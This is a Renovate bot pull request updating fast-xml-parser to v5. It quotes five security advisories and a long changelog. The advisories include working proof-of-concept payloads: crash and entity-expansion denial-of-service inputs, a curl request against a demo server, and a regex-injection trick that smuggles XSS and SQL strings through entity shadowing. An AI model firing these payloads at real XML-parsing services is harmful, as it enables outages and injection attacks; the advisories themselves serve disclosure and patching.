Skip to content

chore(deps): update dependency fast-xml-parser to v5 [security]#205

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-fast-xml-parser-vulnerability
Open

chore(deps): update dependency fast-xml-parser to v5 [security]#205
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-fast-xml-parser-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Jan 31, 2026

Copy link
Copy Markdown
Contributor

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Confidence
fast-xml-parser ^4.5.0^5.0.0 age confidence

fast-xml-parser has RangeError DoS Numeric Entities Bug

CVE-2026-25128 / GHSA-37qj-frw5-hhjh

More information

Details

Summary

A RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., &#​9999999; or �). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.

Details

The vulnerability exists in /src/xmlparser/OrderedObjParser.js at lines 44-45:

"num_dec": { regex: /&#([0-9]{1,7});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 10)) },
"num_hex": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 16)) },

The String.fromCodePoint() method throws a RangeError when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this:

  • [0-9]{1,7} matches up to 9,999,999
  • [0-9a-fA-F]{1,6} matches up to 0xFFFFFF (16,777,215)

The entity replacement in replaceEntitiesValue() (line 452) has no try-catch:

val = val.replace(entity.regex, entity.val);

This causes the RangeError to propagate uncaught, crashing the parser and any application using it.

PoC
Setup

Create a directory with these files:

poc/
├── package.json
├── server.js

package.json

{ "dependencies": { "fast-xml-parser": "^5.3.3" } }

server.js

const http = require('http');
const { XMLParser } = require('fast-xml-parser');

const parser = new XMLParser({ processEntities: true, htmlEntities: true });

http.createServer((req, res) => {
  if (req.method === 'POST' && req.url === '/parse') {
    let body = '';
    req.on('data', c => body += c);
    req.on('end', () => {
      const result = parser.parse(body);  // No try-catch - will crash!
      res.end(JSON.stringify(result));
    });
  } else {
    res.end('POST /parse with XML body');
  }
}).listen(3000, () => console.log('http://localhost:3000'));
Run
##### Setup
npm install

##### Terminal 1: Start server
node server.js

##### Terminal 2: Send malicious payload (server will crash)
curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0"?><root>&#&#8203;9999999;</root>' http://localhost:3000/parse
Result

Server crashes with:

RangeError: Invalid code point 9999999
Alternative Payloads
<!-- Hex variant -->
<?xml version="1.0"?><root>&#xFFFFFF;</root>

<!-- In attribute -->
<?xml version="1.0"?><root attr="&#&#8203;9999999;"/>
Impact

Denial of Service (DoS):* Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:

  • API servers accepting XML payloads
  • File processors parsing uploaded XML files
  • Message queues consuming XML messages
  • RSS/Atom feed parsers
  • SOAP/XML-RPC services

A single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


fast-xml-parser affected by DoS through entity expansion in DOCTYPE (no expansion limit)

CVE-2026-26278 / GHSA-jmr7-xgp7-cmfj

More information

Details

Summary

The XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.

Details

There is a check in DocTypeReader.js that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for & inside entity values). This does stop classic “Billion Laughs” payloads.

However, it doesn’t stop a much simpler variant.

If you define one large entity that contains only raw text (no & characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.

The problem is in replaceEntitiesValue() inside OrderedObjParser.js. It repeatedly runs val.replace() in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.

Relevant code:

DocTypeReader.js (lines 28–33): entity registration only checks for &

OrderedObjParser.js (lines 439–458): entity replacement loop with no limits

PoC
const { XMLParser } = require('fast-xml-parser');

const entity = 'A'.repeat(1000);
const refs = '&big;'.repeat(100);
const xml = `<!DOCTYPE foo [<!ENTITY big "${entity}">]><root>${refs}</root>`;

console.time('parse');
new XMLParser().parse(xml); // ~4–8 seconds for ~1.3 KB of XML
console.timeEnd('parse');

// 5,000 chars × 100 refs takes 200+ seconds
// 50,000 chars × 1,000 refs will hang indefinitely
Impact

This is a straightforward denial-of-service issue.

Any service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can’t handle any other requests.

In testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.

Workaround

Avoid using DOCTYPE parsing by processEntities: false option.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names

CVE-2026-25896 / GHSA-m7jm-9gc2-mpf2

More information

Details

Entity encoding bypass via regex injection in DOCTYPE entity names
Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

entities[entityName] = {
    regx: RegExp(`&${entityName};`, "g"),
    val: val
};

An entity named l. produces the regex /&l.;/g where . matches any character, including the t in &lt;. Since DOCTYPE entities are replaced before built-in entities, this shadows &lt; entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:

// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+";  // no dot
Shadowing all 5 built-in entities
Entity name Regex created Shadows
l. /&l.;/g &lt;
g. /&g.;/g &gt;
am. /&am.;/g &amp;
quo. /&quo.;/g &quot;
apo. /&apo.;/g &apos;
PoC
const { XMLParser } = require("fast-xml-parser");

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
  <text>Hello &lt;b&gt;World&lt;/b&gt;</text>
</root>`;

const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>

No special parser options needed - processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

&amp; can be shadowed too:

const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;

const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'
Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

  • Default config, no special options
  • Attacker can replace any &lt; / &gt; / &amp; / &quot; / &apos; with arbitrary strings
  • Direct XSS vector when parsed XML content is rendered in a page
  • v5 and v6 both affected
Suggested fix

Escape regex metacharacters before constructing the replacement regex:

const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
    regx: RegExp(`&${escaped};`, "g"),
    val: val
};

For v6, add . to the blacklist in validateEntityName:

const specialChar = "!?\\/[].{}^&*()<>|+";
Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

Severity

  • CVSS Score: 9.3 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


fast-xml-parser has stack overflow in XMLBuilder with preserveOrder

CVE-2026-27942 / GHSA-fj3w-jwp8-x2g3

More information

Details

Impact

Application crashes with stack overflow when user use XML builder with prserveOrder:true for following or similar input

[{
    'foo': [
        { 'bar': [{ '@&#8203;_V': 'baz' }] }
    ]
}]

Cause: arrToStr was not validating if the input is an array or a string and treating all non-array values as text content.
What kind of vulnerability is it? Who is impacted?

Patches

Yes in 5.3.8

Workarounds

Use XML builder with preserveOrder:false or check the input data before passing to builder.

References

Are there any links users can visit to find out more?

Severity

  • CVSS Score: 2.7 / 10 (Low)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


fast-xml-parser affected by numeric entity expansion bypassing all entity expansion limits (incomplete fix for CVE-2026-26278)

CVE-2026-33036 / GHSA-8gc5-j5rx-235r

More information

Details

Summary

The fix for CVE-2026-26278 added entity expansion limits (maxTotalExpansions, maxExpandedLength, maxEntityCount, maxEntitySize) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. Numeric character references (&#NNN; and &#xHH;) and standard XML entities (&lt;, &gt;, etc.) are processed through a separate code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption.

Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

Root Cause

In src/xmlparser/OrderedObjParser.js, the replaceEntitiesValue() function has two separate entity replacement loops:

  1. Lines 638-670: DOCTYPE entities — expansion counting with entityExpansionCount and currentExpandedLength tracking. This was the CVE-2026-26278 fix.
  2. Lines 674-677: lastEntities loop — replaces standard entities including num_dec (/&#([0-9]{1,7});/g) and num_hex (/&#x([0-9a-fA-F]{1,6});/g). This loop has NO expansion counting at all.

The numeric entity regex replacements at lines 97-98 are part of lastEntities and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix.

Proof of Concept
const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#&#8203;65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100

Results:

  • 100K &#&#8203;65; references → 500,000 char output (5x default maxExpandedLength of 100,000)
  • 1M references → 5,000,000 char output, ~147MB memory consumed
  • Even with maxTotalExpansions=10 and maxExpandedLength=100, 10K references produce 50,000 chars
  • Hex entities (&#x41;) exhibit the same bypass
Impact

Denial of Service — An attacker who can provide XML input to applications using fast-xml-parser can cause:

  • Excessive memory allocation (147MB+ for 1M entity references)
  • CPU consumption during regex replacement
  • Potential process crash via OOM

This is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them.

Suggested Fix

Apply the same entityExpansionCount and currentExpandedLength tracking to the lastEntities loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670.

Workaround

Set htmlEntities:false

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

NaturalIntelligence/fast-xml-parser (fast-xml-parser)

v5.5.6: fix entity expansion and incorrect replacement and performance

Compare Source

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.5...v5.5.6

v5.5.5

Compare Source

v5.5.4

Compare Source

v5.5.3

Compare Source

v5.5.2

Compare Source

v5.5.1: integrate path-expression-matcher

Compare Source

  • support path-expression-matcher
  • fix: stopNode should not be parsed
  • performance improvement for stopNode checking

v5.5.0

Compare Source

v5.4.2

Compare Source

v5.4.1

Compare Source

v5.4.0: Separate Builder

Compare Source

XML Builder was the part of fast-xml-parser for years. But considering that any bug in builder may false-alarm the users who are only using parser and vice-versa, we have decided to split it into a separate package.

Migration

To migrate to fast-xml-builder;

From

import { XMLBuilder } from "fast-xml-parser";

To

import  XMLBuilder  from "fast-xml-builder";

XMLBuilder will be removed from current package in any next major version of this library. So better to migrate.

v5.3.9: support strictReservedNames

Compare Source

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.9...v5.3.9

v5.3.8: handle non-array input for XML builder && support maxNestedTags

Compare Source

v5.3.7: CJS typing fix

Compare Source

What's Changed

New Contributors

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.6...v5.3.7

v5.3.6: Entity security and performance

Compare Source

  • Improve security and performance of entity processing
    • new options maxEntitySize, maxExpansionDepth, maxTotalExpansions, maxExpandedLength, allowedTags,tagFilter
    • fast return when no edtity is present
    • improvement replacement logic to reduce number of calls

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.5...v5.3.6

v5.3.5

Compare Source

v5.3.4: fix: handle HTML numeric and hex entities when out of range

Compare Source

v5.3.3: bug fix and performance improvements

Compare Source

  • fix #​775: transformTagName with allowBooleanAttributes adds an unnecessary attribute
  • Performance improvement for stopNodes (By Maciek Lamberski)

v5.3.2

Compare Source

v5.3.1

Compare Source

v5.3.0

Compare Source

v5.2.5

Compare Source

v5.2.4

Compare Source

v5.2.3

Compare Source

v5.2.2: upgrade to ESM module and fixing value parsing issues

Compare Source

  • Support ESM modules
  • fix value parsing issues
  • a feature to access tag location is added (metadata)
  • fix to read DOCTYPE correctly

Full Changelog: https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md

v5.2.1

Compare Source

v5.2.0

Compare Source

v5.1.0

Compare Source

  • feat: declare package as side-effect free (#​738) (By Thomas Bouffard)
  • fix cjs build mode
  • fix builder return type to string

5.0.9 / 2025-03-14

  • fix: support numeric entities with values over 0xFFFF (#​726) (By Marc Durdin)
  • fix: update strnum to fix parsing 0 if skiplike option is used

5.0.8 / 2025-02-27

  • fix parsing 0 if skiplike option is used.
    • updating strnum dependency

5.0.7 / 2025-02-25

5.0.6 / 2025-02-20

5.0.5 / 2025-02-20

  • fix parsing of string starting with 'e' or 'E' by updating strnum

5.0.4 / 2025-02-20

  • fix CLI to support all the versions of node js when displaying library version.
  • fix CJS import in v5
    • by fixing webpack config

5.0.3 / 2025-02-20

  • Using strnum ESM module
    • new fixes in strum may break your experience

5.0.2 / 2025-02-20

  • fix: include CommonJS resources in the npm package #​714 (By Thomas Bouffard)
  • fix: move babel deps to dev deps

5.0.1 / 2025-02-19

  • fix syntax error for CLI command

5.0.0 / 2025-02-19

  • ESM support
    • no change in the functionality, syntax, APIs, options, or documentation.

4.5.2 / 2025-02-18

  • Fix null CDATA to comply with undefined behavior (#​701) (By Matthieu BOHEAS)
  • Fix(performance): Update check for leaf node in saveTextToParentTag function in OrderedObjParser.js (#​707) (By ...)
  • Fix: emit full JSON string from CLI when no output filename specified (#​710) (By Matt Benson)

4.5.1 / 2024-12-15

  • Fix empty tag key name for v5 (#​697). no impact on v4
  • Fixes entity parsing when used in strict mode (#​699)

4.5.0 / 2024-09-03

  • feat #​666: ignoreAttributes support function, and array of string or regex (By ArtemM)

4.4.1 / 2024-07-28

4.4.0 / 2024-05-18

  • fix #​654: parse attribute list correctly for self closing stop node.
  • fix: validator bug when closing tag is not opened. (#​647) (By Ryosuke Fukatani)
  • fix #​581: typings; return type of tagValueProcessor & attributeValueProcessor (#​582) (By monholm)

4.3.6 / 2024-03-16

4.3.5 / 2024-02-24

  • code for v5 is added for experimental use

4.3.4 / 2024-01-10

4.3.3 / 2024-01-10

  • Remove unnecessary regex

4.3.2 / 2023-10-02

4.3.1 / 2023-09-24

  • revert back "Fix typings for builder and parser to make return type generic" to avoid failure of existing projects. Need to decide a common approach.

4.3.0 / 2023-09-20

4.2.7 / 2023-07-30

  • Fix: builder should set text node correctly when only textnode is present (#​589) (By qianqing)
  • Fix: Fix for null and undefined attributes when building xml (#​585) (#​598). A null or undefined value should be ignored. (By Eugenio Ceschia)

4.2.6 / 2023-07-17

4.2.5 / 2023-06-22

  • change code implementation

4.2.4 / 2023-06-06

  • fix security bug

4.2.3 / 2023-06-05

  • fix security bug

4.2.2 / 2023-04-18

  • fix #​562: fix unpaired tag when it comes in last of a nested tag. Also throw error when unpaired tag is used as closing tag

4.2.1 / 2023-04-18

  • fix: jpath after unpaired tags

4.2.0 / 2023-04-09

  • support updateTag parser property

4.1.4 / 2023-04-08

  • update typings to let user create XMLBuilder instance without options (#​556) (By Patrick)
  • fix: IsArray option isn't parsing tags with 0 as value correctly #​490 (#​557) (By Aleksandr Murashkin)
  • feature: support oneListGroup to group repeated children tags udder single group

4.1.3 / 2023-02-26

  • fix #​546: Support complex entity value

4.1.2 / 2023-02-12

  • Security Fix

4.1.1 / 2023-02-03

  • Fix #​540: ignoreAttributes breaks unpairedTags
  • Refactor XML builder code

4.1.0 / 2023-02-02

  • Fix '<' or '>' in DTD comment throwing an error. (#​533) (By Adam Baker)
  • Set "eNotation" to 'true' as default

4.0.15 / 2023-01-25

  • make "eNotation" optional

4.0.14 / 2023-01-22

  • fixed: add missed typing "eNotation" to parse values

4.0.13 / 2023-01-07

4.0.12 / 2022-11-19

  • fix typescript

4.0.11 / 2022-10-05

  • fix #​501: parse for entities only once

4.0.10 / 2022-09-14

4.0.9 / 2022-07-10

  • fix #​470: stop-tag can have self-closing tag with same name
  • fix #​472: stopNode can have any special tag inside
  • Allow !ATTLIST and !NOTATION with DOCTYPE
  • Add transformTagName option to transform tag names when parsing (#​469) (By Erik Rothoff Andersson)

4.0.8 / 2022-05-28

4.0.7 / 2022-03-18

  • support CDATA even if tag order is not preserved
  • support Comments even if tag order is not preserved
  • fix #​446: XMLbuilder should not indent XML declaration

4.0.6 / 2022-03-08

  • fix: call tagValueProcessor only once for array items
  • fix: missing changed for #​437

4.0.5 / 2022-03-06

  • fix #​437: call tagValueProcessor from XML builder

4.0.4 / 2022-03-03

  • fix #​435: should skip unpaired and self-closing nodes when set as stopnodes

4.0.3 / 2022-02-15

4.0.2 / 2022-02-04

  • builder supports suppressUnpairedNode
  • parser supports ignoreDeclaration and ignorePiTags
  • fix: when comment is parsed as text value if given as <!--> ... #​423
  • builder supports decoding &

4.0.1 / 2022-01-08

  • fix builder for pi tag
  • fix: support suppressBooleanAttrs by builder

4.0.0 / 2022-01-06

  • Generating different combined, parser only, builder only, validator only browser bundles
  • Keeping cjs modules as they can be imported in cjs and esm modules both. Otherwise refer esm branch.

4.0.0-beta.8 / 2021-12-13

  • call tagValueProcessor for stop nodes

4.0.0-beta.7 / 2021-12-09

  • fix Validator bug when an attribute has no value but '=' only
  • XML Builder should suppress unpaired tags by default.
  • documents update for missing features
  • refactoring to use Object.assign
  • refactoring to remove repeated code

4.0.0-beta.6 / 2021-12-05

  • Support PI Tags processing
  • Support suppressBooleanAttributes by XML Builder for attributes with value true.

4.0.0-beta.5 / 2021-12-04

  • fix: when a tag with name "attributes"

4.0.0-beta.4 / 2021-12-02

  • Support HTML document parsing
  • skip stop nodes parsing when building the XML from JS object
  • Support external entites without DOCTYPE
  • update dev dependency: strnum v1.0.5 to fix long number issue

4.0.0-beta.3 / 2021-11-30

  • support global stopNodes expression like "*.stop"
  • support self-closing and paired unpaired tags
  • fix: CDATA should not be parsed.
  • Fix typings for XMLBuilder (#​396)(By Anders Emil Salvesen)
  • supports XML entities, HTML entities, DOCTYPE entities

⚠️ 4.0.0-beta.2 / 2021-11-19

  • rename attrMap to attibutes in parser output when preserveOrder:true
  • supports unpairedTags

⚠️ 4.0.0-beta.1 / 2021-11-18

  • Parser returns an array now
    • to make the structure common
    • and to return root level detail
  • renamed cdataTagName to cdataPropName
  • Added commentPropName
  • fix typings

⚠️ 4.0.0-beta.0 / 2021-11-16

  • Name change of many configuration properties.
    • attrNodeName to attributesGroupName
    • attrValueProcessor to attributeValueProcessor
    • parseNodeValue to parseTagValue
    • ignoreNameSpace to removeNSPrefix
    • numParseOptions to numberParseOptions
    • spelling correction for suppressEmptyNode
  • Name change of cli and browser bundle to fxparser
  • isArray option is added to parse a tag into array
  • preserveOrder option is added to render XML in such a way that the result js Object maintains the order of properties same as in XML.
  • Processing behaviour of tagValueProcessor and attributeValueProcessor are changes with extra input parameters
  • j2xparser is renamed to XMLBuilder.
  • You need to build XML parser instance for given options first before parsing XML.
  • fix #​327, #​336: throw error when extra text after XML content
  • fix #​330: attribute value can have '\n',
  • fix #​350: attrbiutes can be separated by '\n' from tagname

3.21.1 / 2021-10-31

  • Correctly format JSON elements with a text prop but no attribute props ( By haddadnj )

3.21.0 / 2021-10-25

  • feat: added option rootNodeName to set tag name for array input when converting js object to XML.
  • feat: added option alwaysCreateTextNode to force text node creation (by: @​massimo-ua)
  • ⚠️ feat: Better error location for unclosed tags. (by @​Gei0r)
    • Some error messages would be changed when validating XML. Eg
      • { InvalidXml: "Invalid '[ \"rootNode\"]' found." }{InvalidTag: "Unclosed tag 'rootNode'."}
      • { InvalidTag: "Closing tag 'rootNode' is expected inplace of 'rootnode'." }{ InvalidTag: "Expected closing tag 'rootNode' (opened in line 1) instead of closing tag 'rootnode'."}
  • ⚠️ feat: Column in error response when validating XML
{
  "code": "InvalidAttr",
  "msg":  "Attribute 'abc' is repeated.",
  "line": 1,
  "col": 22
}

3.20.1 / 2021-09-25

  • update strnum package

3.20.0 / 2021-09-10

  • Use strnum npm package to parse string to number
    • breaking change: long number will be parsed to scientific notation.

3.19.0 / 2021-03-14

  • License changed to MIT original
  • Fix #​321 : namespace tag parsing

3.18.0 / 2021-02-05

  • Support RegEx and function in arrayMode option
  • Fix #​317 : validate nested PI tags

3.17.4 / 2020-06-07

  • Refactor some code to support IE11
  • Fix: <tag > space as attribute string

3.17.3 / 2020-05-23

  • Fix: tag name separated by \n \t
  • Fix: throw error for unclosed tags

3.17.2 / 2020-05-23

  • Fixed an issue in processing doctype tag
  • Fixed tagName where it should not have whitespace chars

3.17.1 / 2020-05-19

  • Fixed an issue in checking opening tag

3.17.0 / 2020-05-18

  • parser: fix '<' issue when it comes in aatr value
  • parser: refactoring to remove dependency from regex
  • validator: fix IE 11 issue for error messages
  • updated dev dependencies
  • separated benchmark module to sub-module
  • breaking change: comments will not be removed from CDATA data

3.16.0 / 2020-01-12

  • validaor: fix for ampersand characters (#​215)
  • refactoring to support unicode chars in tag name
  • update typing for validator error

3.15.1 / 2019-12-09

  • validaor: fix multiple roots are not allowed

3.15.0 / 2019-11-23

  • validaor: improve error messaging
  • validator: add line number in case of error
  • validator: add more error scenarios to make it more descriptive

3.14.0 / 2019-10-25

  • arrayMode for XML to JS obj parsing

3.13.0 / 2019-10-02

  • pass tag/attr name to tag/attr value processor
  • inbuilt optional validation with XML parser

3.12.21 / 2019-10-02

  • Fix validator for unclosed XMLs
  • move nimnjs dependency to dev dependency
  • update dependencies

3.12.20 / 2019-08-16

  • Revert: Fix #​167: '>' in attribute value as it is causing high performance degrade.

3.12.19 / 2019-07-28

  • Fix js to xml parser should work for date values. (broken: tagValueProcessor will receive the original value instead of string always) (breaking change)

3.12.18 / 2019-07-27

  • remove configstore dependency

3.12.17 / 2019-07-14

  • Fix #​167: '>' in attribute value

3.12.16 / 2019-03-23

  • Support a new option "stopNodes". (#​150)
    Accept the list of tags which are not required to be parsed. Instead, all the nested tag and data will be assigned as string.
  • Don't show post-install message

3.12.12 / 2019-01-11

  • fix : IE parseInt, parseFloat error

3.12.11 / 2018-12-24

  • fix #​132: "/" should not be parsed as boolean attr in case of self closing tags

3.12.9 / 2018-11-23

  • fix #​129 : validator should not fail when an atrribute name is 'length'

3.12.8 / 2018-11-22

  • fix #​128 : use 'attrValueProcessor' to process attribute value in json2xml parser

3.12.6 / 2018-11-10

3.12.4 / 2018-09-12

  • Fix: include tasks in npm package

3.12.3 / 2018-09-12

  • Fix CLI issue raised in last PR

3.12.2 / 2018-09-11

  • Fix formatting for JSON to XML output
  • Migrate to webpack (PR merged)
  • fix cli (PR merged)

3.12.0 / 2018-08-06

  • Support hexadecimal values
  • Support true number parsing

3.11.2 / 2018-07-23

  • Update Demo for more options
  • Update license information
  • Update readme for formatting, users, and spelling mistakes
  • Add missing typescript definition for j2xParser
  • refactoring: change filenames

3.11.1 / 2018-06-05

  • fix #​93: read the text after self closing tag

3.11.0 / 2018-05-20

  • return defaultOptions if there are not options in buildOptions function
  • added localeRange declaration in parser.d.ts
  • Added support of cyrillic characters in validator XML
  • fixed bug in validator work when XML data with byte order marker

3.10.0 / 2018-05-13

  • Added support of cyrillic characters in parsing XML to JSON

3.9.11 / 2018-05-09

  • fix #​80 fix nimn chars
  • update package information
  • fix #​86: json 2 xml parser : property with null value should be parsed to self closing tag.
  • update online demo
  • revert zombiejs to old version to support old version of node
  • update dependencies

3.3.10 / 2018-04-23

  • fix #​77 : parse even if closing tag has space before '>'
  • include all css & js lib in demo app
  • remove babel dependencies until needed

3.3.9 / 2018-04-18

  • fix #​74 : TS2314 TypeScript compiler error

3.3.8 / 2018-04-17

  • fix #​73 : IE doesn't support Object.assign

3.3.7 / 2018-04-14

  • fix: use let insted of const in for loop of validator
  • Merge pull request
    #​71 from bb/master
    first draft of typings for typescript
    #​69
  • Merge pull request
    #​70 from bb/patch-1
    fix some typos in readme

3.3.6 / 2018-03-21

  • change arrow functions to full notation for IE compatibility

3.3.5 / 2018-03-15

  • fix #​67 : attrNodeName invalid behavior
  • fix: remove decodeHTML char condition

3.3.4 / 2018-03-14

  • remove dependency on "he" package
  • refactor code to separate methods in separate files.
  • draft code for transforming XML to json string. It is not officially documented due to performance issue.

3.3.0 / 2018-03-05

  • use common default options for XML parsing for consistency. And add parseToNimn method.
  • update nexttodo
  • update README about XML to Nimn transformation and remove special notes about 3.x release
  • update CONTRIBUTING.ms mentioning nexttodo
  • add negative case for XML PIs
  • validate xml processing instruction tags #​62
  • nimndata: handle array with object
  • nimndata: node with nested node and text node
  • nimndata: handle attributes and text node
  • nimndata: add options, handle array
  • add xml to nimn data converter
  • x2j: direct access property with tagname
  • update changelog
  • fix validator when single quote presents in value enclosed with double quotes or vice versa
  • Revert "remove unneded nimnjs dependency, move opencollective to devDependencies and replace it
    with more light opencollective-postinstall"
    This reverts commit d47aa71.
  • Merge pull request: #​63 from HaroldPutman/suppress-undefined
    Keep undefined nodes out of the XML output : This is useful when you are deleting nodes from the JSON and rewriting XML.

3.2.4 / 2018-03-01

  • fix #​59 fix in validator when open quote presents in attribute value
  • Create nexttodo.md
  • exclude static from bitHound tests
  • add package lock

3.2.3 / 2018-02-28

  • Merge pull request from Delagen/master: fix namespaces can contain the same characters as xml names

3.2.2 / 2018-02-22

  • fix: attribute xmlns should not be removed if ignoreNameSpace is false
  • create CONTRIBUTING.md

3.2.1 / 2018-02-17

  • fix: empty attribute should be parsed

3.2.0 / 2018-02-16

  • Merge pull request : Dev to Master
  • Update README and version
  • j2x:add performance test
  • j2x: Remove extra empty line before closing tag
  • j2x: suppress empty nodes to self closing node if configured
  • j2x: provide option to give indentation depth
  • j2x: make optional formatting
  • j2x: encodeHTMLchat
  • j2x: handle cdata tag
  • j2x: handle grouped attributes
  • convert json to xml
    • nested object
    • array
    • attributes
    • text value
  • small refactoring
  • Merge pull request: Update cli.js to let user validate XML file or data
  • Add option for rendering CDATA as separate property

3.0.1 / 2018-02-09

  • fix CRLF: replace it with single space in attributes value only.

3.0.0 / 2018-02-08

  • change online tool with new changes
  • update info about new options
  • separate tag value processing to separate function
  • make HTML decoding optional
  • give an option to allow boolean attributes
  • change cli options as per v3
  • Correct comparison table format on README
  • update v3 information
  • some performance improvement changes
  • Make regex object local to the method and move some common methods to util
  • Change parser to
    • handle multiple instances of CDATA
    • make triming of value optionals
    • HTML decode attribute and text value
    • refactor code to separate files
  • Ignore newline chars without RE (in validator)
  • validate for XML prolog
  • Validate DOCTYPE without RE
  • Update validator to return error response
  • Update README to add detail about V3
  • Separate xmlNode model class
  • include vscode debug config
  • fix for repeated object
  • fix attribute regex for boolean attributes
  • Fix validator for invalid attributes
    2.9.4 / 2018-02-02
  • Merge pull request: Decode HTML characters
  • refactor source folder name
  • ignore bundle / browser js to be published to npm
    2.9.3 / 2018-01-26
  • Merge pull request: Correctly remove CRLF line breaks
  • Enable to parse attribute in online editor
  • Fix testing demo app test
  • Describe parsing options
  • Add options for online demo
    2.9.2 / 2018-01-18
  • Remove check if tag starting with "XML"
  • Fix: when there are spaces before / after CDATA

2.9.1 / 2018-01-16

  • Fix: newline should be replaced with single space
  • Fix: for single and multiline comments
  • validate xml with CDATA
  • Fix: the issue when there is no space between 2 attributes
  • Fix: #​33: when there is newline char in attr val, it doesn't parse
  • Merge pull request: fix ignoreNamespace
    • fix: don't wrap attributes if only namespace attrs
    • fix: use portfinder for run t

Note

PR body was truncated to here.


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

